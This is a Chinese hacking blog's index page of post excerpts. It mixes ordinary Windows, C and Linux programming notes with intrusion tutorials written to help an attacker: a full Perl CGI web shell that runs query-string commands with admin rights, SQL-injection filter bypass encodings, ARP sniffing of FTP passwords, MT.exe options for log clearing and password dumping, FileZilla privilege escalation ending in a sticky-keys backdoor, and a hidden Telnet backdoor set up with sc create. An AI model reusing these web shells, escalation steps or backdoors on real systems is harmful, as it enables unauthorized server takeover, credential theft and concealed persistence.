• 1
预览模式: 普通 | 列表

Microsoft.XMLHTTP

Microsoft.XMLHTTP

  Microsoft.XMLHttp组件的属性方法

 

  一、使用步骤:

 

  1、创建XMLHTTP对象 //需MSXML4.0支持

 

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 7421

如何绕过防注入

防注入绕过必用11招
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。

例如or 1=1即
%6f%72%20%31%3d%31

而Test也可以为

CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

查看更多...

Tags: 注入 绕过

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6808

利用Perl提权

 Perl 就是 Practical Extraction and Reporting Language 的简称,是一种最广泛应用于语法分析和 World Wide Web 的编程语言。它起源于 awk、C、sh 和 sed 语言,然而,它的应用开发远比其他任何一种面向对象编程语言更加容易。

  Perl 语言由 Larry Wall 创建,最初作为一种实用解释语言。其主要功能最初是用于分析基于文本的数据和生成这些数据的统计或结果。随着 Internet 的普及推广,我们已经感受到 Perl 在 CGI 编程和处理格式数据上的强大功能。由于 Perl 对 process、文档和文字有很强的处理、变换能力,因此凡是有关快速原型设计、系统工具、软件工具、系统管理、资料库连结、图像程式设计、网络连结和 WWW 程式设计等之类的任务,都特别适合用 Perl 来完成

c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)cgiwebshell放到PERL目录下的BIN目中

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "

\r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

保存为cmd.pl上传至BIN目录执行,

(如果不能运行,可以试试改为cgi 扩展呢,把刚才的 pl文件改为 cgi文件)

在IE浏览窗口中提交提交 http://anyhost//cmd.pl?dir 即可开始执行命令,请注意这个SHELL是具有ADMIN权限的,能够添加帐号并加入管理员组,书写规则是在?后加入你需要执行的命令.

为什么安装PERL能导至黑客在服务器上提升权限呢?原理很简单,因为PERL在默认安装时BIN目录是具有EVERYONE的完全控制权限和CGI执行权限的,所以能执行任意命令,这是一个NTFS权限导至的提权漏洞.

Tags: 权限 黑客 提权 脚本

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6541

asp实现端口扫描源码

今天碰到一个站很恶心,小马传上了大马楞是写不上,后来想了个办法只能把一个大马给拆解了。这是一个扫描端口的。以后碰到的时候直接就好用了。


<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
ASP实现TCP端口扫描的方法
ASP实现TCP端口扫描的方法
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>ASP TCP Port Scanner for SpringBoard</title>

 

<%

查看更多...

Tags: 代码 asp 扫描 端口 源码

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7006

cain嗅探突破ARP防火墙

cain嗅探突破ARP防火墙

今天嫌着无事,来试下内网arp欺骗,

我在本机搭建一了一个虚拟机系统(XP SP2),以虚拟机为目标,在本机发起攻击,其实就是欺骗网关来达到目的,目标是截取到虚拟机登陆到外网FTP时候的密码与帐号,测试完全成功。成功截取到我空间的帐号密码.

 

突破arp防火墙
 

然而上面只是针对目前未装arp防火墙的机器而已,

查看更多...

Tags: arp 嗅探

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8498

VC实现将资源打包并释放到指定文件夹

很多时候,我们可能要将某些文件打包到资源中,然后当程序执行的时候,发现缺少某些文件时,进行自我修复,以维持程序的正常执行,

很多安装程序或者比较高级点的智能程序都已经这样做,比如文件损坏时,安装程序将修复这些文件.一些高级程序的常用设置及文件

遇到破坏时, 也会自我修复,它们的这些神奇功能,全都是依靠自身的资源包,替换损坏的文件,或者创建新的默认文件实现的.

下面我来说一说这种程序比较普通的一些做法:

首先在程序入口处,我们以MFC程序为例子,我们找到APP文件,在InitInstance()中执行文件检查, 如果发现某些文件损坏或者不存在,

那么我们将自身资源包的正常文件释放出来,在这里我给出两个函数,一个是检查指定文件是否存在,另一个是释放资源包文件的函数.

BOOL FileExteriorFile(LPCTSTR FileName)//查找指定的文件是否存在
{
WIN32_FIND_DATA fd;
HANDLE hd=::FindFirstFile(FileName,&fd);//开始查找
if(hd==INVALID_HANDLE_VALUE)
{
return FALSE;
}
FindClose(hd);//关闭查找
return TRUE;
}

发现不存在时,将调用下面的函数释放资源包的文件

//将指定资源释放到指定目录下生成特定文件
BOOL FreeMyData(LPCTSTR ResName, LPCTSTR ResType, LPCTSTR FileName, int Type)
{
BOOL bRet = TRUE;
HINSTANCE hInst = AfxGetInstanceHandle();

//先判断我们指定的资源是否存在
HRSRC hResInfo = FindResource(hInst,ResName,ResType);

if(hResInfo == NULL)
return FALSE;

HANDLE hFile = NULL;
DWORD dwWritten = 0;

// 开始调入指定的资源到内存
HGLOBAL hResData = LoadResource(hInst,hResInfo);
LPVOID pvResData = LockResource(hResData);
DWORD dwResSize = SizeofResource(hInst,hResInfo);

//再创建目标文件并保存数据至文件
if(Type == 1)//系统加隐藏属性 如果指定类型为1,那么加上系统和隐藏属性,防止普通用户对文件进行破坏
{
hFile = CreateFile(FileName,GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_Delete,
NULL,Create_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM, NULL);
WriteFile(hFile, pvResData, dwResSize, &dwWritten, NULL);
}
else
{
hFile = CreateFile(FileName,GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_Delete,
NULL,Create_ALWAYS,FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile, pvResData, dwResSize, &dwWritten, NULL);
}
if(hFile == INVALID_HANDLE_VALUE)//创建文件失败
{
FreeResource(hResData);
return FALSE;
}

//释放有关内存资源
CloseHandle(hFile);
FreeResource(hResData);

return TRUE;
}

将上面两个函数COPY到你工程的APP文件中,现在假设你已将一个 Demo.dat文件通过资源映射导入工程当中,类型属于ExFile,文件名是IDR_EXFILE1,

那么你在 InitInstance()中的调用形式如下:

if(!FileExteriorFile(FileName))//注意:FileName是你指定目录下的指定文件
{
if(!FreeMyData(MAKEINTRESOURCE(IDR_EXFILE1), "ExFile", FileName,0))//释放文件到指定目录
{
MessageBox(NULL,FileName,"Free File Fail:",MB_ICONERROR);
}

}

这样你就已实现了将资源包释放出来替换或者覆盖某些文件的目的,你可以释放的文件类型可以是EXE文件,DLL文件等等.

在编写该程序的过程当中,我还加入了很多特殊的功能,比如释放出一个新的EXE文件,然后执行,再把自身销毁,这个时候杀毒程序警告我,这是一个病毒,

哈哈,可能病毒就是这样的搞的.那么你还等什么,赶快试试吧.
分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 6741

MT的详细用法

用法: mt.exe <选项>
选项 :
-filter ---更改 TCP/IP 过滤器的开头状态
-addport ---添加端口到过滤器的允许列表
-setport ---设置端口作为过滤器的允许列表
-nicinfo ---列出 TCP/IP 界面信息
-pslist ---列出活动进程
-pskill ---杀毒指定进程
-dlllist ---列出指定进程的 DLL
-sysinfo ---列出系统信息
-shutdown ---关闭系统
-reboot ---重启系统
-poweroff ---关闭电源
-logoff ---注销当前用户会话
-chkts ---检查终端服务信息
-setupts ---安装终端服务
-remts ---卸载终端服务
-chgtsp ---重置终端服务端口
-clog ---清除系统日志
-enumsrv ---列出所有服务
-querysrv ---列出指定服务的详细信息
-instsrv ---安装一个服务
-cfgsrv ---更改服务配置
-remsrv ---卸载指定服务
-startsrv ---启动指定服务
-stopsrv ---停止指定服务
-netget ---从 http/ftp 下载
-redirect ---端口重定向
-chkuser ---列出所有账户、sid 和 anti 克隆
-clone ---克隆 admin 到目标
-never ---设置账户看上去从未登录
-killuser ---删除账户,甚至是 "guest" 也可删除
-su ---以 Local_System 权限运行进程
-findpass ---显示所有已登录用户的口令
-netstat ---列出 TCP 连接
-killtcp ---杀死 TCP 连接
-psport ---映射端口到进程
-touch ---设置文件日期和时间到指定值
-secdel ---安全擦除文件或目录占用的空间
-regshell ---进入一个控制台注册表编辑器
-chkdll ---检测 gina dll 后门

 

1.mt -sysinfo 查看机器配置

先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6566

 c语言winsock 实现域名解析

  1. #include   <stdio.h>   
  2. #include   <Winsock2.h>   
  3. #include   <windows.h>      
  4.   
  5. typedef struct _DNSHEAD{        //dns 头部   
  6.         USHORT ID;   
  7.         USHORT tag; // dns 标志(参数)   
  8.         USHORT numQ;        // 问题数   
  9.         USHORT numA;        // 答案数   
  10.         USHORT numA1;       // 权威答案数   
  11.         USHORT numA2;       // 附加答案数   
  12. }DnsHead;   

查看更多...

Tags: dns解析 c语言

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 9680

Console Functions

The following functions used to access a console.

 
 
AllocConsole 
CreateConsoleScreenBuffer 
FillConsoleOutputAttribute 
FillConsoleOutputCharacter 
FlushConsoleInputBuffer 
FreeConsole 
GenerateConsoleCtrlEvent 
GetConsoleCP 
GetConsoleCursorInfo 
GetConsoleMode 
GetConsoleOutputCP 
GetConsoleScreenBufferInfo 
GetConsoleTitle 
GetLargestConsoleWindowSize 
GetNumberOfConsoleInputEvents 
GetNumberOfConsoleMouseButtons 
GetStdHandle 
HandlerRoutine 
PeekConsoleInput 
ReadConsole 
ReadConsoleInput 
ReadConsoleOutput 
ReadConsoleOutputAttribute 
ReadConsoleOutputCharacter 
ScrollConsoleScreenBuffer 
SetConsoleActiveScreenBuffer 
SetConsoleCP 
SetConsoleCtrlHandler 
SetConsoleCursorInfo 
SetConsoleCursorPosition 
SetConsoleMode 
SetConsoleOutputCP 
SetConsoleScreenBufferSize 
SetConsoleTextAttribute 
SetConsoleTitle 
SetConsoleWindowInfo 
SetStdHandle 
WriteConsole 
WriteConsoleInput 
WriteConsoleOutput 
WriteConsoleOutputAttribute 
WriteConsoleOutputCharacter 

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 6358

网络字节换函数

socket编程时网络传输数据必须转换为网络字节序,而且不管IP是哪种字节序系统识别都必须为unsigned long型,点分式IP仅方便记忆,下面介绍一些常用转换函数。

函数原型:unsigned long inet_addr( const char* cp ); 将char*类型转换为网络字节顺序,返回32位的unsigned long型,例addrSrv.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");其中addrSrv是套接字对象。

函数原型:char* FAR inet_ntoa( struct in_addr in ); 参数为in_addr结构体,返回点分格式的IP地址。

函数原型:u_long htonl( u_long hostlong );

查看更多...

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 6367

FileZilla提权

事情的起因:一次拿到一个个人讲师的webshell,想提权,服务器权限设置的不严,但是提权不好提,只有一个C盘,也没装什么软件,没 mysql,mssql,su,360等一些熟悉的提权软件。执行下命令看看吧!netstat -an看到有个默认的端口14147网上搜了下原来是一款叫做FileZilla的FTP软件的一个管理端口。网上搜了下FileZilla提权,还真有http://xiaoyi.us/archFPipe.exeives/230。用了此上说的方法,但是始终连接不上,可能真的像作者说的对与网络的带宽的要求很高,或者是硬防的问题。但是自己后来想,serv-U能通过lcx直接转发,然后本地连接,为什么还要用FPipe.exe这东西呢!重新试了下,转发的太少了,还是网速问题。5秒左右才返回一个5bytes数据包给本地。难道这个办法不行?不死心在虚拟机实验了。成功了,就有了此文。
首先找到FileZilla的安装目录,打开FileZilla Server Interface.xml,里面有管理口令

 

在虚拟机里进行转发如下图
FileZilla提权
这里使用的本地IP是127.0.0.1因为FileZilla的管理IP地址只能是127.0.0.1
转发成功了,返回信息
FileZilla提权
接下来就是用FileZilla客户端来连接了
FileZilla提权
嘿嘿,连接成功
FileZilla提权
接下来就是添加用户,设置目录为C盘,权限设置为完全控制即可
FileZilla提权
FileZilla提权
FileZilla Server不比serv-U,可以quote site exec执行dos命令,要实现提权的话可以FTP登录上去操作文件管理,如替换系统服务、替换系统文件、将程序置于启动目录等等。
我这里就替换粘贴键了,3389登陆,5下shift拿下服务器。
FileZilla提权

 

查看更多...

Tags: 教程 权限 提权 ftp 软件 ftp

分类:网络安全 | 固定链接 | 评论: 1 | 查看次数: 7987

巧建Telnet后门

经常搞服务器的朋友对后门一定不陌生,后门的好坏直接决定着你控制服务器的时间长短.后门弄不好的话,今天能上,明天被踢,就是常有的事了.今天给大家介绍一种特殊后门的建立方法,就是Telnet后门.
(一) 关于"Telnet"
Telnet用于Internet的远程登录.它可以使用户坐在已上网的电脑键盘前通过网络进入另一台已上网的电脑,使它们互相连通.这种连通可以发生在同一房间里面的电脑,或是在世界各范围内已上网的电脑.习惯上来说,被连通并且为网络上所有用户提供服务的计算机称之为服务器(Servers),而自己使用的机器则称之为客户机(Customer).一旦连通后,客户机可以享有服务器所提供的一切服务.用户可以进行通常的交互过程(注册进入,执行命令),也可以进入很多特殊的服务器,如寻找图书索引.网上不同的主机提供的各种服务都可以被使用.
下面介绍我们来认识一下关于Telnet的相关程序.
telnet.exe是客户机程序(Client),我们本地机登陆远程服务器就是通过它.
tlntsvr.exe是服务器程序(Server),在远程服务器运行,由Telnet服务指向并启动.
tlntadmn.exe是Telnet服务器管理程序,可以用它对服务器程序进行配置.
我们可以看到,如此方便的程序,给黑客们做后门是再好不过了.然而,服务器管理员迫于Telnet的"好名声",不敢享用这个好东西,纷纷把它禁用掉了,这就把我们小黑们用Telnet的权利给剥夺了.
(二) 夺回使用Telnet服务的权利
拿到服务器后,建个隐藏用户是"小菜一碟".但是以后我们通过什么样的途径进入呢?此时,服务端禁用的Telnet服务常令小黑们咬牙切齿.要想使用它必须让服务器端程序tlntsvr.exe运行.不过,如果把禁用的服务重新启用,不等于告诉管理员我们到这里遛过一圈吗?看来只能另想其他方法了.这里我给大家提供两种方法:
方法一:
既然tlntsvr.exe是提供服务的主程序,我们重新建立一个服务指向它不就行了.这样查看服务时,Telnet服务虽然仍被禁用,可实际上,新建的服务已经让tlntsvr.exe为我们大开方便之门.
首先,在服务器端建立服务.我们用Windows自带的程序sc.exe实现.在命令行下键入"sc"显示帮助文件,sc.exe用法很多,这里我们用"sc create"命令来创建服务.
用法:sc create [service name] [binPath= ] <option1> <option2>...
键入命令 "sc create Security binPath= c:\windows\system32\tlntsvr.exe start= auto"
表示创建一个服务名称为Security,启动类型为自动的服务,服务指向程序"c:\windows\system32\tlntsvr.exe".
如果显示 [SC] CreateService SUCCESS 则表示服务创建成功.
然后,用"net start Security"命令启动服务.
这时,我们打开服务管理可见,Security服务已经启动,但Telnet服务依然显示禁用.(如图1)。

 

Telnet后门

 

方法二:
上述方法虽然可以实现我们的目的,但缺点也是有的.我们用奇虎360查看一下服务(如图2)

查看更多...

Tags: telnet 后门

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7176

Linux命令速查手册

一. 启动,关机,登入,登出相关命令
[login] 登录
[logout] 登出
[exit] 登出
[shutdown] 停止系统

查看更多...

分类:linux教程 | 固定链接 | 评论: 1 | 查看次数: 5534
  • 1
博主QQ: 友情链接请找我
QQ群: 灰色档案
返回顶部 关闭